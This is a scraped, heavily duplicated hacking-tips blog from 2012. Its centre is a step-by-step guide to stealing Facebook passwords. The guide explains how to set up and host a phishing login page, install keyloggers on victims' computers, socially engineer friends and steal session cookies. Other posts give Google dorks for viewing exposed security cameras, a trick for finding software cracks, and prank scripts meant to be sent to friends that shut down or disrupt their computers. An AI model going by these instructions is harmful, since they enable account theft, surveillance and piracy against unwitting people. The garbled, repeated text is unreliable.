Make a Private Folder with Your Password without Software
Posted by Nikhil Chawra 6/22/2012
Step 1:- Open the Notepad.exe
Step 2:- Copy the following code into the notepad.
Step 2:- Copy the following code into the notepad.
@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDENTER PASSWORD TO OPEN
:CONFIRM
echo -----------------------------------------------------------
echo ================== Www.infototechno.blogspot.com ==================
echo -----------------------------------------------------------
echo Are you sure you want to lock the folder(Y/N)
echo Press (Y) for Yes and Press (N) for No.
echo -----------------------------------------------------------
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo -----------------------------------------------------------
echo ================== Www.infototechno.blogspot.com ==================
echo -----------------------------------------------------------
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== YOUR PASSWORD goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDENTER PASSWORD TO OPEN
md Private
echo Private created successfully
goto End
:End
Step 3:- Now change the password in the if NOT %pass%==YOUR PASSWORD goto FAIL line replace text of Your Password with your password for the folder lock.
Step 4:- Now save this file as locker.bat and you are done.
Step 5:- Now Open the Locker.bat file and enter your password to open a private folder of yours.
Step 6:- Now copy paste the files which you want to hide and make it secure in the private folder.
Step 7:- Now again open the Locker.bat file and press 'Y' to lock the private folder with your password.
Step 8:- Now to again open the secured files open the locker.bat file Enter your password and your files are there for you.
4 Ways To Hack Facebook Account
Posted by Nikhil Chawra 6/18/2012
Today, I am going to tut u about faceb0ok account hacking. Here I will tut u about 5 advance method with the help of which you can hack ur enemy's facebook password.
I will cover 4 methods over here:
1. Facebook Phishing
2. Keylogging
3. Social engineering
4. Primary email address hack
5. Cookie Stealing
you may also read this :-
Hack A Facebook Account With ARP Poisoning
How to Hack Facebook Status by SMS Spoofing
Facebook phishing:
I have taken this method first because i think this is the most popular method/way of hacking facebook. I studied various facebook surveys taken on web about hacking facebook. The results of these surveys show "Phishing" as the most used method to hack facebook and to note…"Phishing is favorite method of facebook hackers". So, friends.. beware of facebook Phishing. Facebook staff is working hard to avoid these Facebook phishers. Phishing not only allows you to hack Facebook but also almost any email account. You have to only get the trick used to make a phisher, which i think is very easy. I learnt it without any difficulty. But, remember, this is only for educational purpose.
what is phishing?

5. Create an id in www.110mb.com,www.ripway.com or t35.com.
Note: Lots of people have complaint that they get banned from 110mb.com.ripway.com and t35.com so as an alternative you can use ooowebhost.
6. Then upload all the files Facebook.htm,Pass.php in 110mb directory or an other and just test it by going to http://yoursite.110mb.com/Facebook.htm for the fake login page.Just type some info into the text box and then you will see in your file manager that a file called "Facebook.txt" is created, In which the password is stored
7. Go to http://yoursite.110mb.com/Facebookpassword.htm for the stored passwords !
and see you got the password .
Keylogging:
This is my second favorite, as only thing you have to do is remotely install a keylogger application (if you don't have any physical access to victim computer). Keylogging becomes more easy if you have physical access to victim computer as only thing you have to do is install a keylogger and direct it to your destination so that it will send all recorded keystrokes to pointed destination. What a keylogger does is it records the keystrokes into a log file and then you can use these logs to get required Facebook password and thus can hack facebook password.
Best Keyloggers- Winspy Keylogger, SniperSpy
3. Social engineering:
This sounds to be pretty not working at beginning. Even I was neglecting this way. But, once, I thought of using it against my friend on Facebook and i got his Facebook password very easily by this method. I think many of you might be knowing how what this social engineering, For newbies, social engineering is method of retrieving password or answer of security question simply be quering with the victim. You have to be very careful while using this as victim must not be aware of your intention. Just ask him cautiously using your logic.
4.Primary email address hack
I
am updating this post with a new method which is being used to hack
facebook accounts, which I think is very effective, Facebook cookie
stealing is becoming popular day by day.The cookie which facebook uses
to authenticate it's users is called "Datr", If an attacker can get hold
of your authentication cookies, All he needs to do is to inject those
cookies in his browser and he will gain access to your account
Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc;
I will cover 4 methods over here:
1. Facebook Phishing
2. Keylogging
3. Social engineering
4. Primary email address hack
5. Cookie Stealing
you may also read this :-
Hack A Facebook Account With ARP Poisoning
How to Hack Facebook Status by SMS Spoofing
Facebook phishing:
I have taken this method first because i think this is the most popular method/way of hacking facebook. I studied various facebook surveys taken on web about hacking facebook. The results of these surveys show "Phishing" as the most used method to hack facebook and to note…"Phishing is favorite method of facebook hackers". So, friends.. beware of facebook Phishing. Facebook staff is working hard to avoid these Facebook phishers. Phishing not only allows you to hack Facebook but also almost any email account. You have to only get the trick used to make a phisher, which i think is very easy. I learnt it without any difficulty. But, remember, this is only for educational purpose.
what is phishing?
Phishing is the most commonly used method to hack Facebook. The
most widely used technique in phishing is the use of Fake Login Pages,
also known as spoofed pages. These fake login pages resemble the
original login pages of sites like Yahoo , Gmail, MySpace etc. The victim
is fooled to believe the fake facebook page to be the real one and
enter his/her password. But once the user attempts to login through
these pages, his/her facebook login details are stolen away. However
phishing requires specialized knowledge and high level skills to
implement. So I recommend the use of Phishing to hack facebook account
since it is the easiest one.
Phishing Procedure :
First of all download Facebook fake login page
1. once you have downloded facebook fake login page now extract contents in a folder
2. Now open pass.php and find (CTRL+F) 'http://infototechno.blogspot.com' then change it to your to is the 'http://www.google.com.bg'
Note: 'http://www.google.com' is the redirection url,When victim will enter his/her email and password he will redirected to'http://www.google.com.bg' instead of "http://infototechno.blogspot.in"
Now Save it .
3 .Now open facebook fake page in a wordpad
4. Now in the fake page press Ctrl+F and search for the term "action=" now change its value to pass.php i.e. action=pass.php
Phishing Procedure :
First of all download Facebook fake login page
1. once you have downloded facebook fake login page now extract contents in a folder
2. Now open pass.php and find (CTRL+F) 'http://infototechno.blogspot.com' then change it to your to is the 'http://www.google.com.bg'
Note: 'http://www.google.com' is the redirection url,When victim will enter his/her email and password he will redirected to'http://www.google.com.bg' instead of "http://infototechno.blogspot.in"
Now Save it .
3 .Now open facebook fake page in a wordpad
4. Now in the fake page press Ctrl+F and search for the term "action=" now change its value to pass.php i.e. action=pass.php
5. Create an id in www.110mb.com,www.ripway.com or t35.com.
Note: Lots of people have complaint that they get banned from 110mb.com.ripway.com and t35.com so as an alternative you can use ooowebhost.
6. Then upload all the files Facebook.htm,Pass.php in 110mb directory or an other and just test it by going to http://yoursite.110mb.com/Facebook.htm for the fake login page.Just type some info into the text box and then you will see in your file manager that a file called "Facebook.txt" is created, In which the password is stored
7. Go to http://yoursite.110mb.com/Facebookpassword.htm for the stored passwords !
This is my second favorite, as only thing you have to do is remotely install a keylogger application (if you don't have any physical access to victim computer). Keylogging becomes more easy if you have physical access to victim computer as only thing you have to do is install a keylogger and direct it to your destination so that it will send all recorded keystrokes to pointed destination. What a keylogger does is it records the keystrokes into a log file and then you can use these logs to get required Facebook password and thus can hack facebook password.
Best Keyloggers- Winspy Keylogger, SniperSpy
3. Social engineering:
This sounds to be pretty not working at beginning. Even I was neglecting this way. But, once, I thought of using it against my friend on Facebook and i got his Facebook password very easily by this method. I think many of you might be knowing how what this social engineering, For newbies, social engineering is method of retrieving password or answer of security question simply be quering with the victim. You have to be very careful while using this as victim must not be aware of your intention. Just ask him cautiously using your logic.
4.Primary email address hack
If Facebook hacker,
by some means, hacks your gmail or yahoo account which you are using as
primary email address, then this Facebook hacker can easily hack your Facebook password using "Forgot password"
trick. He will simply ask Facebook to send password reset email to your
primary email address- which is already hacked. Thus, your Facebook
account password will be reset and it will be hacked !!!
So, always remember to protect your Facebook primary email address and try to keep unknown or useless mail id as your primary email address
So, always remember to protect your Facebook primary email address and try to keep unknown or useless mail id as your primary email address
So far, i found these Facebook hacking methods as best and working ways to hack facebook account passwords. I never encourage hacking Facebook
or any email account,,I just wanna make you aware about Facebook
dangers online. I will appreciate your effort if you mention any other
Facebook hacking method.
5. Facebook Cookie Stealing
Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc;
CEH Official Certified Ethical Hacker Review Guide
Posted by Nikhil Chawra 6/18/2012
The EC-Council's Certified Ethical Hacker has emerged as one of today's most sought-after certifications. This is the only official review guide to the test, covering all CEH exam objectives, from ethics and testing to securing wired and wireless networks. Written by bestselling certification author Todd Lammle, this concise, focused guide is ideal for people who have taken CEH classes and need a last-minute review. The CD-ROM features two bonus exams, 150 flashcard questions, a searchable glossary of key terms, and hacking tools used in the EC-Council's CEH training.
Get Serial NO. of Any Software through Google
Posted by Nikhil Chawra 6/11/2012
What is Serial No. -
A serial number is a unique code assigned for identification of a single unit. Although usually called a number, it may include letters, though ending with digits. Typically serial numbers of a production run are incremented by one, or another fixed difference, from one unit to the next. Units may be marked with several alphanumeric codes, but only one of these will be a serial number; others are sometimes called nominal numbers, and may identify the part, specify installed options, and so on.
- wikipedia
A Short Trick
Go to Google
Type this syntax in search bar " 94FBR "
A serial number is a unique code assigned for identification of a single unit. Although usually called a number, it may include letters, though ending with digits. Typically serial numbers of a production run are incremented by one, or another fixed difference, from one unit to the next. Units may be marked with several alphanumeric codes, but only one of these will be a serial number; others are sometimes called nominal numbers, and may identify the part, specify installed options, and so on.
A Short Trick
Go to Google
Type this syntax in search bar " 94FBR "
Replace Product name with desired software and leave a space then type 94FBR
Press enter, thats it
Now you receive Many pages which contains Serial no, Crack, Patches....
Press enter, thats it
Now you receive Many pages which contains Serial no, Crack, Patches....
How to Get YOUR FRIEND'S IP Address STEP BY STEP
Posted by Nikhil Chawra 6/11/2012
is help of cmd commad netstat
open ur cmd type in netstat help to get all the commands and to find ip use netstat -a
share as many things with victim like photos, song or any other type of file
when ur sharing then open cmd type in netstat -an and all the list will come and see the establishment and you will get the ip
Other netstat commands:
-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s option.
-n Displays addresses and port numbers in numerical form.
-p Proto Shows connections for the protocol specified by proto; proto may be TCP or UDP.
-s Option to display per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the
-p Option may be used to specify a subset of the default.
Second method is the help of websites
I give you two websites that help you to find the ip address
here are the links
http://shivampatel.net/trace/
http://whatstheirip.com/
open these websites and read the instructions you will get to know how to do it.
NotePad Tricks To Scare Your Friends
Posted by Nikhil Chawra 6/10/2012
Most of you must be aware about a tool called notepad. It is a simple text based editor. But today I am going to discuss some cool tricks which you can perform on your computer using notepad. You can also use these tricks to scare your friends.
FOR MESSAGE BOX:
TYPE:
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
Save it as pc.bat and send it to your friends.
___________________________________________________________________________
Make Keyboard Keys Type Continuously:
Type :
MsgBox “stop me..! if you can”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Save it as pc.vbs and send it to your friends.
_____________________________________________________________________________
Convey your friend a message and shut down his/ her computer.
Type :
@echo off
msg * I don’t like you
shutdown -c “Hahahah You are Doomed” -s
Save it as pc.bat and send it to your friends.
_______________________________________________________________________________
Toggle your friend’s Caps Lock button simultaneously
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
Save it as pc.bat and send it to your friends.
___________________________________________________________________________
Make Keyboard Keys Type Continuously:
Type :
MsgBox “stop me..! if you can”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Save it as pc.vbs and send it to your friends.
_____________________________________________________________________________
Convey your friend a message and shut down his/ her computer.
Type :
@echo off
msg * I don’t like you
shutdown -c “Hahahah You are Doomed” -s
Save it as pc.bat and send it to your friends.
_______________________________________________________________________________
Toggle your friend’s Caps Lock button simultaneously
Type :
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Save it as pc.vbs and send it to your friends.
______________________________________________________________________________
Frustrate your friend by making their keyboard hit Enter simultaneously whenever they press a key :
Type :
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
Save it as pc.vbs and send it to your friends.
________________________________________________________________________________
Hack your friend’s keyboard and make him type “You are a fool” simultaneously:
Type :
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “You are a fool.”
loop
Save it as pc.vbs and send it to your friends.
________________________________________________________________________________
Open Notepad, slowly type anythingand freak your friends out:
Type :
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo “
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re “
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? “
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “
Save it as pc.vbs and send it to your friends.
____________________________________________________________________________
Frustrate your friend by making their keyboard hit Backspace simultaneously whenever they press a key :
Type :
MsgBox “Let’s rock and roll”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Save it as pc.vbs and send it to your friends.
______________________________________________________________________________
Frustrate your friend by making their keyboard hit Enter simultaneously whenever they press a key :
Type :
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
Save it as pc.vbs and send it to your friends.
________________________________________________________________________________
Hack your friend’s keyboard and make him type “You are a fool” simultaneously:
Type :
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “You are a fool.”
loop
Save it as pc.vbs and send it to your friends.
________________________________________________________________________________
Open Notepad, slowly type anythingand freak your friends out:
Type :
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo “
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re “
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? “
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “
Save it as pc.vbs and send it to your friends.
____________________________________________________________________________
Frustrate your friend by making their keyboard hit Backspace simultaneously whenever they press a key :
Type :
MsgBox “Let’s rock and roll”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Save it as pc.vbs and send it to your friends.
____________________________________________________________________________
Open Notepad continuously in your friend’s computer:
Type :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as pc.bat and send it.
______________________________________________________________________________
Continuously pop out your friend’s CD or DVD Drive.
Type :
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as pc.vbs and send it to your friends.
___________________________________________________________________________
How to Make Your PC Virus Free
Posted by Nikhil Chawra 6/10/2012
1. E-mails:
This is the most of the common way through which spywares, worms, Trojans and viruses find their easy way into your computer. When you have your own private emails, increase the privacy settings and never ever open unsolicited and unknown emails, as they may be the source of the much awaiting harms that can damage your whole computer. To avoid this harming your computer, use very good anti-spam software. Never click links in e-mails if you are not sure what are they.
This is the most of the common way through which spywares, worms, Trojans and viruses find their easy way into your computer. When you have your own private emails, increase the privacy settings and never ever open unsolicited and unknown emails, as they may be the source of the much awaiting harms that can damage your whole computer. To avoid this harming your computer, use very good anti-spam software. Never click links in e-mails if you are not sure what are they.
2. USB thumb or pen drives:
This is another and most common source that could affect your computer in a number of ways. The best option to avoid this from happening is by performing a virus scan before copying any data onto your computer and another small tip is not to double click the pen drive for opening. Use right click to open or explore the files in the drive before opening is the best alternative.
3. Use of MS Outlook:
It is not known that MS Outlook could be a source and the best way to spread and hack into your computer, unless you have a real time antivirus programs running. Alternatives to MS Outlook will include the use Windows Mail (which can even identify spam emails from known sources), Pegasus of thunderbird, or web based programs like hotmail or Yahoo.
4. Internet or World Wide Web:
Even a basic computer user knows that internet is the best way to spread viruses like pandemic and are the main sources of malicious programs like viruses, worms, Trojans, etc., which can range up to 80 percent of the worldwide transfer during surfing of the web. By following some of the best surfing habits this danger could be waded off, which will include by not clicking the pop-up windows or by using pop-up blockers.
5. Search Engines:
Most of us surf the web using mostly with the help of search engines, and one of the best ways either to prevent from visiting malicious website from being listed in your search or to point them out when listed, is by installing some powerful scanners like AVG Link scanner, which is a free ware. Even Mozilla says if a site will harm your computer or not.
6. Use a good antivirus:
If you are looking for one solution that can do most of the jobs mentioned so far, it is also good for preventing from someone else stealing your personal information like online identity, credit card information, password stealing and many other such activities. So always use a powerful antivirus.
Comments are always appreciated!!
This is another and most common source that could affect your computer in a number of ways. The best option to avoid this from happening is by performing a virus scan before copying any data onto your computer and another small tip is not to double click the pen drive for opening. Use right click to open or explore the files in the drive before opening is the best alternative.
3. Use of MS Outlook:
It is not known that MS Outlook could be a source and the best way to spread and hack into your computer, unless you have a real time antivirus programs running. Alternatives to MS Outlook will include the use Windows Mail (which can even identify spam emails from known sources), Pegasus of thunderbird, or web based programs like hotmail or Yahoo.
4. Internet or World Wide Web:
Even a basic computer user knows that internet is the best way to spread viruses like pandemic and are the main sources of malicious programs like viruses, worms, Trojans, etc., which can range up to 80 percent of the worldwide transfer during surfing of the web. By following some of the best surfing habits this danger could be waded off, which will include by not clicking the pop-up windows or by using pop-up blockers.
5. Search Engines:
Most of us surf the web using mostly with the help of search engines, and one of the best ways either to prevent from visiting malicious website from being listed in your search or to point them out when listed, is by installing some powerful scanners like AVG Link scanner, which is a free ware. Even Mozilla says if a site will harm your computer or not.
6. Use a good antivirus:
If you are looking for one solution that can do most of the jobs mentioned so far, it is also good for preventing from someone else stealing your personal information like online identity, credit card information, password stealing and many other such activities. So always use a powerful antivirus.
Comments are always appreciated!!
How To Detect That a Keylogger is Installed on a Computer or Not
Posted by Nikhil Chawra 6/10/2012
Key loggers are software that traces the key strokes on your computer. It is done in such a way that a person using the computer is unaware of the fact that a key logger is installed on a particular PC.
How does keyloggers enters your computer ?
How does keyloggers enters your computer ?
There are several ways in which a key logger can get into your computer either it is directly installed or it is indirectly transferred to your computer. Most of the time, this malicious file enters a computer when the user downloads an infected application like movies, music or other software applications.
So how to get rid of keyloggers that is installed on a computer

1. Use updated antivirus and anti spyware
Some of the good anti viruses have capability to detect key loggers. So you should update your antiviruses regularly so that it gets updated for new keyloggers.
2. Use Anti keyloggers
There are anti keyloggers available that will make the task easy for you in finding a keyloggers. Use these softwares if you think there is a high possibility of keyloggers on a computer. The anti keyloggers that i will suggest you is Cyberhawk. Even Kasperky does a good job in this area too. Also check anti-spy.info. More examples:
http://www.microsoft.com/athome/security/spyware/software/default.mspx
http://www.lavasoftusa.com/software/adaware/
3. Search for keyloggers yourself
Keyloggers have the capability that they hide them self from the user but are active in the background. There are some shortcuts that are used to see them live on screen
For example : Ctrl + Alt + X or Ctrl + Alt + Wondows Key + X or desktopshark etc.
4. Use special tools
SnoopFree
Freeware antikeylogger that block hook based keyloggers as well as screen captures. For Windows XP.
PSMAntiKeyLogger
PSMAntiKeyLogger is a real-time protecting software which protects you against Keyloggers. No scanning is needed.
1. Use updated antivirus and anti spyware
Some of the good anti viruses have capability to detect key loggers. So you should update your antiviruses regularly so that it gets updated for new keyloggers.
2. Use Anti keyloggers
There are anti keyloggers available that will make the task easy for you in finding a keyloggers. Use these softwares if you think there is a high possibility of keyloggers on a computer. The anti keyloggers that i will suggest you is Cyberhawk. Even Kasperky does a good job in this area too. Also check anti-spy.info. More examples:
http://www.microsoft.com/athome/security/spyware/software/default.mspx
http://www.lavasoftusa.com/software/adaware/
3. Search for keyloggers yourself
Keyloggers have the capability that they hide them self from the user but are active in the background. There are some shortcuts that are used to see them live on screen
For example : Ctrl + Alt + X or Ctrl + Alt + Wondows Key + X or desktopshark etc.
4. Use special tools
SnoopFree
Freeware antikeylogger that block hook based keyloggers as well as screen captures. For Windows XP.
PSMAntiKeyLogger
PSMAntiKeyLogger is a real-time protecting software which protects you against Keyloggers. No scanning is needed.
Security cameras on internet through Google
Posted by Nikhil Chawra 6/10/2012
Step 1. Open internet your web browser.
Step 2. Go to a search engine of your choice (i.e. Google, Yahoo, etc.), and input any of the search commands as listed below.
Step 3. After you search one of these queries, you will see some search results, click on any one of them.
Step 4. Depending on the type of camera that you have access to, you may be able to control the camera like zoom, pan, and tilt the camera to see what you want to.
Step 5. Do not try to get onto password protected cameras, as this will not go unnoticed if too many attempts are made
Some Commands to be Remember to Find Live CCTV Cameras.
inurl:/view.shtml
intitle:”Live View / – AXIS” | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / – AXIS 206M”
intitle:”Live View / – AXIS 206W”
intitle:”Live View / – AXIS 210″
inurl:indexFrame.shtml Axis
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1″
viewnetcam.com
intitle:”Toshiba Network Camera” user login
intitle:”i-Catcher Console – Web Monitor”
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1″
viewnetcam.com
intitle:”Toshiba Network Camera” user login
intitle:”i-Catcher Console – Web Monitor”
Use these commands in Google Search and get the desired result.
?
+
X
Recommended for you
Loading..












